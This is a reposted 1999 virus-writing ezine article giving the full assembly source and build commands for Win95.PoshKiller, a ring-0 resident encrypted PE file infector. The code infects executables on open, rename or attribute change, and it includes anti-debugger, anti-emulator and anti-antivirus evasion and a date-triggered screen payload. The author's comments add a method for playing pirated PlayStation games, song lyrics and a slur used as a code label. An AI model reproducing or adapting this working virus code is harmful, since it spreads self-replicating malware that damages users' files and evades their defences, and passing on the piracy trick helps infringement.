Copy Link
Add to Bookmark
Report

Xine - issue #4 - Phile 209

eZine's profile picture
Published in 
Xine
 · 7 months ago

 
/-----------------------------\
| Xine - issue #4 - Phile 209 |
\-----------------------------/

; [Win95.PoshKiller] - Ring-0 resident PE infector
; Copyright (c) 1999 by Billy Belcebu/iKX
;
; Virus Name : PoshKiller
; Virus Author : Billy Belcebu/iKX
; Origin : Spain
; Platform : Win95/98
; Target : PE files (EXE,SCR,CPL)
; Compiling : TASM 5.0 and TLINK 5.0 should be used
; tasm32 /ml /m3 poshkill,,;
; tlink32 /Tpe /aa /c /v poshkill,poshkill,,import32.lib,
; pewrsec poshkill.exe
; Features : Well, here goes the list of what does this virus:
; ù Ring-0 virus by means of modifying the IDT.
; ù Win9X resident encrypted PE infector (EXE/SCR/CPL).
; ù Anti-emulators (FPU in decryptor, make fake GPFs).
; ù Anti-debugger (SEH, Anti-SoftICE, INT 3).
; ù Anti-monitors (with Super's kinda tunneling trick).
; ù Anti-heuristics (not detected by AVP32,NODICE32,etc).
; ù Infects on open, rename and in attribute change.
; ù Used Pentium instructions.
; ù Graphical payload, thanx to the p0rt g0d nIgr0 :)
; Payload : The first graphical payload FULL WORKING in Ring-0, coz
; it uses ports for perform its action. It scrolls the screen
; contents from right to left. The payload was coded with the
; knowledge, ideas and presence of nIgr0.
; Notes : Well, about the name of the virus, i think it's quite clear
; I hate those poshes, their attitude, their world slave of
; capitalism, slave of the fascism of the fashion, trying to
; keep being the beautiful people... There are MANY of those
; around my life, but i try to be isolated from them, i don't
; want to be as sick as them :) But, at least, let me say an
; existencial question that hurts me... Why the posh girls
; are the preetiest girls around? Hehehe, i ask this because
; it is a constant in my life: i know some impressive preety
; girls, and ALL them are really (and sadly) posh.
; Well, the worst is when a posh is also catholic, but this
; is another history... I also know some of them (boys and
; girls), and they hate me as i hate'em. Nice, heh? :)
; Miscellaneous : VERY INTERESTING! :) If some of you have a PlayStation (i
; know many people that waste their time playing with it, but
; anyway...), and you want to use pirate games, and you don't
; trust in anyone for put the goddamn multisystem chip, there
; is a trick for use the pirate games without installing the
; chip. You'll need, of course, a playstation, and at least
; one original game (a demo can be used too), and a pirate
; game. Firstly, you must make your playstation to be able to
; keep opened the CD drive while running games (this is done
; by a simple trick that most of you already know). Well, the
; trick consists in the following:
; 1ø Put the original CD in its place, and you'll see how the
; playstation begins to rotate it. But you will see that af-
; ter a few seconds, it slowdown a little the rotation. Then
; you must substitute the original CD by the pirate one.
; 2ø Then you'll see how the pirate CD begins its rotation,
; and then, after a few seconds you'll see that it slowdowns
; the rotation, and then substitute the pirate CD by the ori-
; ginal CD.
; 3ø Now follows the hardest part. The original CD will begin
; it's rotation. And after 1 second you'll hear a "clic" so-
; und. Now it's the moment. Substitute fastly the original CD
; with the pirate CD and... Voil…! :)
;
; The horrible people, the horrible people
; It's as anatomic as the size of your stepple
; Capitalism has made it this way
; Old fashioned fascism
; will take it away!!!!
;
; -Marilyn Manson-
;
; Amunt ValŠncia!!! la copa Šs nostra!!! (26-6-99),
; Billy Belcebu/iKX
;

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Constants, data and another shit |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

.586p ; Really needed!
.model flat ; Hehehe i love 32 bit stuph ;)

TRUE equ 1
FALSE equ 0

DEBUG equ TRUE ; Oh my beloved SoftIce... :)

; VxD functions used

VMM_Get_DDB equ 00010146h
IFSMgr_GetHeap equ 0040000Dh
IFSMgr_RetHeap equ 0040000Eh
IFSMgr_Ring0_FileIO equ 00400032h
UniToBCSPath equ 00400041h
IFSMgr_InstallFileSystemApiHook equ 00400067h

; IFSMgr_Ring0_FileIO functions used

R0_DELETEFILE equ 04100h
R0_FILEATTRIBUTES equ 04300h
R0_OPENCREATFILE equ 0D500h
R0_CLOSEFILE equ 0D700h
R0_READFILE equ 0D600h
R0_WRITEFILE equ 0D601h
R0_GETFILESIZE equ 0D800h

; FileSystem intercepted functions

IFSFN_FILEATTRIB equ 21h
IFSFN_OPEN equ 24h
IFSFN_RENAME equ 25h

; Constants of the virus

virus_size equ (offset virus_end-offset virus_start)
encrypt_size equ (offset virus_end-offset encrypt_start)
size_to_allocate equ virus_size+2048
section_flags equ 00000020h or 20000000h or 80000000h
rva_key equ (offset KeyEnc-offset virus_start)

IF DEBUG
Interrupt equ 05h
ELSE
Interrupt equ 03h ; Let'z antidebug their arse
ENDIF

rdtcs equ <dw 310Fh>

; Macro for make the VxD Calls required

VxDCall macro VxDService
local @@@@@@
int 20h ; CD 20 +00
dd VxDService ; XX XX XX XX +02
jmp @@@@@@ ; EB 04 +06
dd VxDService ; XX XX XX XX +08
@@@@@@:
endm

; Sufrir s... ­PIJO DE MIERDA! El poder del metal... El castigo infernal...

extrn ExitProcess:PROC
extrn MessageBoxA:PROC

.data

szTitle db "Win9X.PoshKiller."
db virus_size/1000 mod 10 +"0"
db virus_size/0100 mod 10 +"0"
db virus_size/0010 mod 10 +"0"
db virus_size/0001 mod 10 +"0"
db 00h

szMessage db "C'mon posh. I believe in myself and in anyone else,",10
db "while you believe in the capitalism; i innovate,",10
db "you copy; i live, you don't. Why? I killed you.",10
db "Copyright (c) 1999 by Billy Belcebu/iKX",10

; Mi vezino me atormenta, todo el dia en los 40, le ha soplado a mi vieja ke
; bebo mas de la kuenta... "Como le pille en la eskalera... ­me lo kargo a
; guitarrazos!"

.code

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Initialize virus, and get Ring-0 privilege |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

virus_start label byte

poshkiller:
IF DEBUG
int 3
ENDIF
pushad

jmp kutre_delta ; 'sup? i don't like the
petakakas: ; ussual method: AVP32 catches
pop edi ; it :)

mov ecx,encrypt_size/4 ; ECX = Encrypted size in DWORDS

call overkey
KeyEnc dd 00000000h
TempByt dd 00000000h
overkey:
pop esi ; ESI = Pointer to enc. key
mov edx,[esi]
mov ebx,esi
add ebx,4 ; EBX = Pointer to a temp dword

finit ; Initialize math coprocessor

; Megafast FPU decryption!

eloop: fild dword ptr [edi] ; Push the dword to decrypt
fistp dword ptr [ebx] ; Pop in temporal address
xor dword ptr [ebx],edx ; Decrypt dword in that address
fild dword ptr [ebx] ; Push decrypted integral
fistp dword ptr [edi] ; Store the decrypted integral
add edi,4 ; Actualize counter
loop eloop ; Loop until all is decrypted
jmp strip ; And go over that shitty call

kutre_delta: ; Shitty method for get
call petakakas ; inital address to decrypt

encrypt_start label byte

db " [IAIDA] " ; Here she is! The girl with
; the sweetest smile i've ever
; know... also the best in
; many other fields :)~

; Psch‚, quiz  si sea un babosillo :) Pero, joder, no la conoceis...
; (ni quiero que lo hagais mamones!!! Es m¡a y solo m¡a!!! X-DDD)

strip: call getdeltax ; Ol' good days delta offset!
getdeltax:
pop ebp
mov eax,ebp
sub ebp,offset getdeltax

sub eax,(offset getdeltax-offset poshkiller)
sub eax,00001000h ; Get imagebase at runtime
newEIP equ $-4
mov dword ptr [ebp+ibase],eax

call SetUpSEH
mov esp,[esp+8] ; Restore stack if fault
call restore_old_bytes ; Fix this shit
jmp DeactivateSEH
SetUpSEH:
xor ebx,ebx ; Setup SEH
push dword ptr fs:[ebx]
mov fs:[ebx],esp

push edx
sidt fword ptr [esp-2] ; Interrupt table to stack
pop edx

add edx,(Interrupt*8)+4 ; Get interrupt vector

mov ebx,[edx]
mov bx,word ptr [edx-4] ; Grmffxzxmfmfmzmzxxxxggrrr...

lea edi,[ebp+InterruptHandler] ; Wheeeeehoooowww?

mov [edx-4],di
shr edi,16 ; Move MSW to LSW
mov [edx+2],di

int Interrupt ; Ring-0 jump!

mov [edx-4],bx ; Restore old interrupt values
shr ebx,16 ; ROR, SHR, SAR... who cares?
mov [edx+2],bx

or ebp,ebp ; 1st generation shitzor
jz host

call restore_old_bytes ; Restore host's first bytes

DeactivateSEH:
xor ebx,ebx ; Restore old SEH handler
pop dword ptr fs:[ebx]
pop edx

back2host:
popad
mov ebx,00400000h ; Imagebase obtained at
ibase equ $-4 ; runtime
add ebx,00001000h ; Old EIP, patched during
base equ $-4 ; infection time

fninit ; Uninitialize coprocessor

push ebx ; Return to host
ret

; SHOOT SHOOT SHOOT MOTHERFUCKER!!!!!!!!!!!!!

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Restore original host's first bytes |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

restore_old_bytes:
mov edi,dword ptr [ebp+ibase] ; Restore first bytes
add edi,dword ptr [ebp+base] ; EDI = Old EIP
lea esi,[ebp+oldjmpy] ; ESI = Original bytes
mov ecx,sjumpy
rep movsb
ret

; I went to god just to see and i was looking at me!

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Ring-0 code |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

InterruptHandler:
pushad

call shitz0r ; Get Ring-0 delta offset
shitz0r:
pop ebp
sub ebp,offset shitz0r

IFNDEF DEBUG
mov eax,202h ; Detect SoftICE
@@5: VxDCall VMM_Get_DDB
jecxz no_softice
jmp r3_back ; If it's there, avoid install
no_softice: ; the virus ;)
ENDIF

mov eax,dr2
cmp eax,"LLIK" ; Are we resident?
jz r3_back ; Yez, go away

push size_to_allocate ; Get Memory from the heap
@@1: VxDCall IFSMgr_GetHeap
pop ecx ; Fucking VxD services... :)

or eax,eax ; Function succesful?
jz r3_back ; Back to the boring Ring-3! :(

and byte ptr [ebp+semaphore],0 ; Reset semaphore variable :)

xchg edi,eax ; Where move virus

push edi ; And save it for later
lea esi,[ebp+poshkiller]
mov ecx,virus_size
rep movsb ; Move virus to its TSR location ;)
pop edi

lea ecx,[edi+New_Handler] ; Install FileSystem Hook
push ecx
@@2: VxDCall IFSMgr_InstallFileSystemApiHook
pop ecx

xchg esi,eax ; ESI = Last hook handler
push esi
add esi,4 ; ESI = Hook info
tunnel: lodsd
xchg eax,esi
add esi,08h
js tunnel ; If ESI < 7FFFFFFF, it was
; the last one :)
mov dword ptr [edi+ptr_top_chain],eax ; Save in its var in mem
pop eax ; EAX = Last hook handler
mov dword ptr [edi+Old_Handler],eax

mov eax,"LLIK" ; Kewl residence mark :)
mov dr2,eax

r3_back:
popad
iretd ; return to Ring-3 :(

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | FileSystem hook |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

New_Handler equ $-(offset virus_start)

FSA_Hook:
enter 20h,00h ; Create stack frame

; Some useful stuff in stack, now in EBP
; --------------------------------------
;
; [EBP+1Ch] -> pointer to IOREQ structure.
; [EBP+18h] -> codepage that the user string was passed in on.
; [EBP+14h] -> kind of resource the operation is being performed on.
; [EBP+10h] -> the 1-based drive the operation is being performed on
; (-1 if UNC).
; [EBP+0Ch] -> function that is being performed.
; [EBP+08h] -> address of the FSD function that is to be called for this
; API.

mov ecx,6 ; Push all that with a loop,
mov ebx,1Ch ; that's is the most optimized
pushit: mov eax,[ebp+ebx] ; way to do this :)
push eax
sub ebx,4
loop pushit

mov eax,dword ptr [ebp+0Ch] ; EAX = Function
not eax

cmp eax,not IFSFN_OPEN ; File Open? Infect if it is
jz infect

cmp eax,not IFSFN_RENAME ; File Rename? Infect if it is
jz infect

cmp eax,not IFSFN_FILEATTRIB ; File Attribute change?
jz infect ; Infect if it is

back2oldhandler:
db 0B8h ; MOV EAX,imm32 opcode
Old_Handler equ $-(offset virus_start)
OldFSA dd 00000000h
call [eax] ; Call previous handler
add esp,18h ; Fix stack
leave
ret

infect:
pushad
call ring0_delta ; Get delta offset of this
ring0_delta:
pop ebx
sub ebx,offset ring0_delta

cmp byte ptr [ebx+semaphore],00h ; Avoid recursive infection :)
jnz pushnback

inc byte ptr [ebx+semaphore] ; Red light semaphore! :)

lea esi,dword ptr [ebx+top_chain] ; Make null top chain, so we
lodsd ; avoid monitors by means of
xor edx,edx ; cutting their balls :)
xchg [eax],edx

pushad
call infection_stuff ; Infect!
popad

mov [eax],edx ; Restore top chain

dec byte ptr [ebx+semaphore] ; Green light!

pushnback:
popad
jmp back2oldhandler

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Infect file if EXE |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

infection_stuff:
lea edi,[ebx+fname]
push edi
mov eax,[ebp+10h]
cmp al,0FFh
jz wegotdrive
add al,"@"
stosb
mov al,":"
stosb

wegotdrive:
xor eax,eax
push eax ; push 00h
inc ah
push eax ; push 100h
mov eax,[ebp+1Ch]
mov eax,[eax+0Ch]
add eax,4
push eax ; push offset unicode_filename
push edi ; push offset asciiz_filename

@@3: VxDCall UniToBCSPath ; Convert to ASCII

add esp,10h
add edi,eax
xor eax,eax ; Make string null-terminated
stosb

pop edi ; Get end of string :)
xor al,al
scasb
jnz $-1

mov eax,dword ptr [edi-05h] ; EAX = Extension of file
or eax,20202020h ; make lowercase extension
not eax ; no, no, no!! :)

cmp eax,not "exe." ; Infect if EXE file
jz itsveryfunny
cmp eax,not "lpc." ; Infect if CPL file
jz itsveryfunny
cmp eax,not "rcs." ; Infect if SRC file
jz itsveryfunny

jmp notsofunny

itsveryfunny:
IF DEBUG ; Only if debugging shitz0rz
cmp dword ptr [edi-0Ch],"TAOG" ; If not a goat, don't execute
jnz notsofunny
ENDIF

call payload ; Lauch payload (if date matchz)


lea edi,[ebx+fname]
pushad
call AvoidShitFiles
popad
jc notsofunny

mov esi,edi ; Get File Attributes
mov eax,R0_FILEATTRIBUTES
push eax
call R0_FileIO
pop eax

jc notsofunny

push esi ; Save'em
push ecx

xor ecx,ecx ; Clear attributes
inc eax
push eax
call R0_FileIO

jc stillnotsofunny

mov esi,edi ; Open file a'la DOS
mov eax,R0_OPENCREATFILE
xor ecx,ecx
mov edx,ecx
inc edx ; EDX = 1
mov ebx,edx
inc ebx ; EBX = 2
call R0_FileIO

jc stillnotsofunny

xchg eax,ebx ; hehehe... as we did in DOS :)

call inf_delta ; Plurg... Delta offset!
inf_delta:
pop ebp
sub ebp,offset inf_delta

mov eax,R0_READFILE ; Read the dword that marks
push eax ; us the beginning of PE
mov ecx,4 ; header
mov edx,03Ch
lea esi,[ebp+pehead] ; There goez the PE header offzet
call R0_FileIO

pop eax
mov edx,dword ptr [ebp+pehead] ; Now read 1024 bytes of PE
lea esi,[ebp+header] ; header. I think it's enough.
mov ecx,400h
call R0_FileIO

cmp dword ptr [esi],"EP" ; Is it PE?
jnz muthafucka

cmp dword ptr [esi+4Ch],"HSOP" ; Was it already infected?
jz muthafucka
mov dword ptr [esi+4Ch],"HSOP" ; Damned poshes

mov edi,esi ; Save in EDI the PE offset

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | PE Infection routinez |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

movzx eax,word ptr [edi+06h] ; Get last section of header
dec eax
imul eax,eax,28h
add esi,eax
add esi,78h
mov edx,[edi+74h]
shl edx,03h
add esi,edx ; ESI = last section header
; EDI = PE header
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov eax,edx ; EAX = SizeOfRawData
add edx,[esi+0Ch] ; EDX = New EIP
add eax,[esi+14h] ; EAX = Where append virus
push eax ; Save it

push dword ptr [esi+10h] ; Save actual SizeOfRawData

mov eax,virus_size ; EAX = VirusSize
add eax,[esi+10h] ; EAX = VirusSize+SizeOfRawData
mov ecx,[edi+3Ch] ; ECX = Alignment
call align ; Align it!
mov [esi+10h],eax ; EAX = New SizeOfRawData &
mov [esi+08h],eax ; New VirtualSize

add eax,[esi+0Ch] ; EAX = New SizeOfCode
mov [edi+50h],eax ; Put it!

pop eax ; EAX = Old SizeOfRawData
mov ecx,[esi+10h] ; ECX = New SizeOfRawData
sub ecx,eax ; Get the difference (size to
push ecx ; append) and save it

mov eax,[edi+28h] ; EAX = Host's EIP
mov dword ptr [ebp+base],eax ; Save it
mov dword ptr [ebp+newEIP],edx ; And where virus begins

sub edx,eax ; Contruct relative offset
sub edx,sjumpy ; for make the jump
mov dword ptr [ebp+(jumpy+1)],edx ; Store the address

or [esi+24h],section_flags ; Update section's flagz

mov esi,edi
add esi,0F8h-28h ; Pointer to 1st section-28h
nigger: add esi,28h ; Ptr to section name ;)
mov edx,eax ; Put in EDX the original EIP
sub edx,[esi+0Ch] ; Remove the VirtualAddress
cmp edx,[esi+08h] ; Is EIP pointing to this sec?
jae nigger ; If not, loop again

or [esi+24h],section_flags ; Put sum attributes

push esi ; Read first bytes beginning
mov eax,R0_READFILE ; from the EIP, the first
add edx,[esi+14h] ; bytes that are executed
lea esi,[ebp+oldjmpy] ; by the program, and save'em
mov ecx,sjumpy
call R0_FileIO
pop esi

mov eax,R0_WRITEFILE ; Write it some shit to pass
mov ecx,sjumpy ; the control to the virus
push esi ; See jumpyx label for more
lea esi,[ebp+jumpyx] ; details ;)
call R0_FileIO
pop esi

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Append, and close file |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

mov eax,R0_WRITEFILE ; Write the modified header
mov ecx,400h ; to the file
mov edx,dword ptr [ebp+pehead]
lea esi,[ebp+header]
call R0_FileIO

push virus_size ; Allocate the virus size
@@6: VxDCall IFSMgr_GetHeap
pop ecx

mov dword ptr [ebp+temp_addr],eax

pushad
call VxDFix
popad

xchg eax,edi ; Copy virus to temporal
push edi ; heap chunk
lea esi,[ebp+virus_start]
rep movsb
pop esi

push esi

rdtcs ; Get a random number
xchg eax,edx
mov dword ptr [esi+rva_key],edx ; Save encrypt key in virus
add esi,virus_size-encrypt_size
mov edi,esi
mov ecx,encrypt_size/4

el00p: lodsd ; Encrypt virus
xor eax,edx
stosd
loop el00p

pop esi ; ESI = Ptr to virus_start

pop ecx ; ECX = Size (rounded) to append
pop edx ; EDX = Ptr where append

mov eax,R0_WRITEFILE ; Append virus
call R0_FileIO

push dword ptr [ebp+temp_addr]
@@7: VxDCall IFSMgr_RetHeap ; Free memory used by 2nd copy
pop ecx

IF DEBUG
pushad
call beepy
popad
ENDIF

muthafucka:
mov eax,R0_CLOSEFILE ; Close file
call R0_FileIO

stillnotsofunny:
pop eax ; Restore its attributes
pop ecx
pop esi
call R0_FileIO

notsofunny:
ret

R0_FileIO: ; Optimize for the table
@@4: VxDCall IFSMgr_Ring0_FileIO
ret

; On input:
; EAX = Number to align
; ECX = Alignment factor
; On output:
; EAX = Aligned number

align:
push edx
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
ret

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Graphical payload if date is 26th of October |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

payload:
mov al,07h ; Get date
out 70h,al
in al,71h

cmp al,26h ; Is it 26th?
jnz no_payload ; No, shit.

mov al,08h ; Get month
out 70h,al
in al,71h

cmp al,10h ; Is it 10th?
jnz no_payload ; No, shit.

xor ebx,ebx ; Make 0 the counter
xor ecx,ecx
dec ecx ; Make -1 the repeatition :)

scroll:
mov edx,03D4h ; Graphical payload by using
mov al,0Ch ; ports. Original code in
out dx,al ; ATT assembler by nIgr0, and
mov edx,03D5h ; adapted by him and me at my
mov al,bh ; home the 30th of June :)
out dx,al ; Thanx nIgr0! Go on with
mov edx,03D4h ; "that" thingy :)
mov al,0Dh
out dx,al
mov edx,03D5h
mov al,bl
out dx,al
inc ebx
push ecx
mov ecx,0000FFFFh ; Some delay, for slowdown a
loop $ ; little the effect
pop ecx
loop scroll

no_payload:
ret

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Avoid infection of certain files |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

AvoidShitFiles:
lea esi,[ebx+@@BadProgramz] ; Ptr to table
mov eax,"." ; Search filename for a dot
scasb
jnz $-1
mov eax,"\" ; Now reverse the direction and search
std ; for the last \
scasb
jnz $-1
inc edi ; Fix it
inc edi
cld
ASF_Loop:
xor eax,eax ; Clear EAX
lodsb ; Load size of string in AL
cmp al,0BBh ; End of table?
jz AllShitFilesProcessed ; Oh, shit!
xchg eax,ecx ; Put Size in ECX
push edi ; Preserve program pointer
rep cmpsb ; Compare both strings
pop edi ; Restore program pointer
jz ShitFileFound ; Damn, a shitty file!
add esi,ecx ; Pointer to another string
jmp ASF_Loop ; in table & loop
AllShitFilesProcessed:
mov cl,00h ; Overlap, so CL = 0F9h
org $-1
ShitFileFound:
stc ; Set carry
ret

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Fix all VxDCallz |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

VxDFix:
mov ecx,VxDTbSz ; Number of VxDs
lea esi,[ebp+VxDTblz] ; Pointer to table
@lo0pz: lodsd ; Load current offset in EAX
add eax,ebp ; Add delta :)
mov word ptr [eax],20CDh ; Put in that address
mov edx,dword ptr [eax+08h] ; Get VxD Service value
mov dword ptr [eax+02h],edx ; And restore it
loop @lo0pz
ret

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Interesting tables |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

VxDTblz label byte
dd offset (@@1) ; IFSMgr_GetHeap
dd offset (@@2) ; IFSMgr_InstallFileSystemApiHook
dd offset (@@3) ; UniToBCSPath
dd offset (@@4) ; IFSMgr_Ring0_FileIO
IFNDEF DEBUG
dd offset (@@5) ; VMM_Get_DDB
ENDIF
dd offset (@@6) ; IFSMgr_GetHeap
dd offset (@@7) ; IFSMgr_RetHeap
VxDTbSz equ (($-offset VxDTblz)/4) ; Numbah of VxDCalls in code

; Files to ignore, don't infect'em!

@@BadProgramz label byte
db 02h,"TB" ; ThunderByte?
db 02h,"F-" ; F-Prot?
db 03h,"NAV" ; Norton Antivirus?
db 03h,"AVP" ; AVP?
db 03h,"WEB" ; DrWeb?
db 03h,"PAV" ; Panda?
db 03h,"DRW" ; DrWeb?
db 04h,"DSAV" ; Dr Solomon?
db 03h,"NOD" ; Nod-Ice?
db 06h,"WINICE" ; SoftICE?
db 06h,"FORMAT" ; Format?
db 05h,"FDISK" ; Fdisk?
db 08h,"SCANDSKW" ; ScanDisk?
db 06h,"DEFRAG" ; Defrag?
db 0BBh

; For jump building

jumpyx label byte
call seh_tricky
mov esp,[esp+08h]
xor edx,edx
pop dword ptr fs:[edx]
pop edx
jumpy: db 0E9h
dd 00000000h
seh_tricky:
xor edx,edx
push dword ptr fs:[edx]
mov fs:[edx],esp
dec byte ptr [edx] ; DIE EMULATORS!!!!!!
sjumpy equ ($-offset jumpyx)

; Store here overwritten data

oldjmpy db sjumpy dup (00h)

; My mark :)

mark db "[Win95.PoshKiller v1.00]",0
db "(c) 1999 Billy Belcebu/iKX",0

IF DEBUG
beepy:
mov ax, 1000
mov bx, 200
mov cx, ax
mov al, 0b6h
out 43h, al
mov dx, 0012h
mov ax, 34dch
div cx
out 42h, al
mov al, ah
out 42h, al
in al, 61h
mov ah, al
or al, 03h
out 61h, al
l1:
mov ecx, 4680
l2:
loop l2
dec bx
jnz l1
mov al, ah
out 61h, al
ret
ENDIF
virus_end label byte

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Data in the heap |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

heap_begin label byte
semaphore db 00h
pehead dd 00000000h
ptr_top_chain equ ($-offset virus_start)
top_chain dd 00000000h
temp_addr dd 00000000h
fname db 100h dup (00h)
header db 400h dup (00h)
heap_end label byte

; Jo parle en Valenci…, no en catal….

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | First generation host |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host:
pop dword ptr fs:[0]
pop eax
popad

push 00000000h
push offset szTitle
push offset szMessage
push 00000000h
call MessageBoxA

push 00000000h
call ExitProcess

end poshkiller

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Bonus Track |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
;
; If you know spanish, and you are as i am, you'll understand and feel
; identified with the following lyrics. It speaks about how the people change
; (becoming worse) because the system. It's from Def Con Dos' last album
; called 'DE POCA MADRE'. Enjoy!
;
; Fin de siglo
; ------------
;
; No se si a ti te ata¤e
; no se si a ti te extra¤a
; pero noto a mis amigos algo raro en sus miradas
; no me reconocen, ya no me saludan
; y ahora todos llevan traje azul en vez de chupa
; Ya no beben en la calle
; ya no paran en los bares
; ya no mean en las esquinas
; ni vomitan en los portales
; Ahora madrugan, se han vuelto gente seria
; que ahorra para la vejez y vota a la derecha
; No se que pasa cuando quiero hablar con mis amigos
; no cogen el telefono o me dicen que se han ido
; no consigo dar con ellos para ir juntos a montarla
; y siempre acabo solo apoyando codo en barra
; Algo huele raro, algo no me han dicho
; y empiezo a sospechar que han sido abducidos
; La abduccion es un problema de todos
; por favor no me dejeis ­NO! no me dejeis solo
; FIN DE SIGLO rodeado de abducidos
; FIN DE SIGLO
; FIN DE SIGLO solo y sin amigos
; Vaya fin de siglo mas jodido
; FIN DE SIGLO rodeado de abducidos
; FIN DE SIGLO
; FIN DE SIGLO solo y sin amigos
; Vaya fin de siglo mas jodido
; No se si a ti te ata¤e
; no se si a ti te extra¤a
; pero replicas de mis amigos han salido de unas vainas
; son iguales que ellos, tienen su misma cara, pero se que
; no son ellos cuando observo sus miradas
; Todos se han cortado las gre¤as
; todos han sentado la cabeza
; y lo que antes odiaban, ahora se celebra
; Ya no fuman PETAS, solo van de farla
; y visten polo azul con la bandera patria
; Todos felices, todos con el movil
; hablan entre ellos, son un nuevo orden
; La abduccion es un problema de todos
; por favor no me dejeis ­NO! no me dejeis solo
; FIN DE SIGLO rodeado de abducidos
; FIN DE SIGLO
; FIN DE SIGLO solo y sin amigos
; Vaya fin de siglo mas jodido
; FIN DE SIGLO rodeado de abducidos
; FIN DE SIGLO
; FIN DE SIGLO solo y sin amigos
; Vaya fin de siglo mas jodido
;
; ---
; Copyright (c) 1998 Def Con Dos; "De Poca Madre" album.



← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT